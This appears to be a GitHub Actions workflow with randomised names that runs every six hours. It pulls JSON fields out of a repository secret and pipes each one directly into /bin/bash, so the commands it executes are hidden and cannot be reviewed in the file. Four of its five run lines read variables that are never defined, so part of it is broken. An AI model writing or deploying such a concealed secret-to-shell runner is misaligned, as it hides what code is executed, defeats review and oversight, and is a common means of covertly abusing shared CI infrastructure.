name: zhangshancui4657

on:
  workflow_dispatch:
  schedule:
    - cron: '36 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhangshancui4657
        env:
          plmuz52: ${{ secrets.plmuz52 }}
        run: |
          echo $plmuz52 | jq -r .ppaoe1312 | /bin/bash
          echo $upq4126 | jq -r .p1 | /bin/bash
          echo $r685 | jq -r .tzj34058 | /bin/bash
          echo $gkh29 | jq -r .pbks423 | /bin/bash
          echo $ynr8 | jq -r .d14373 | /bin/bash

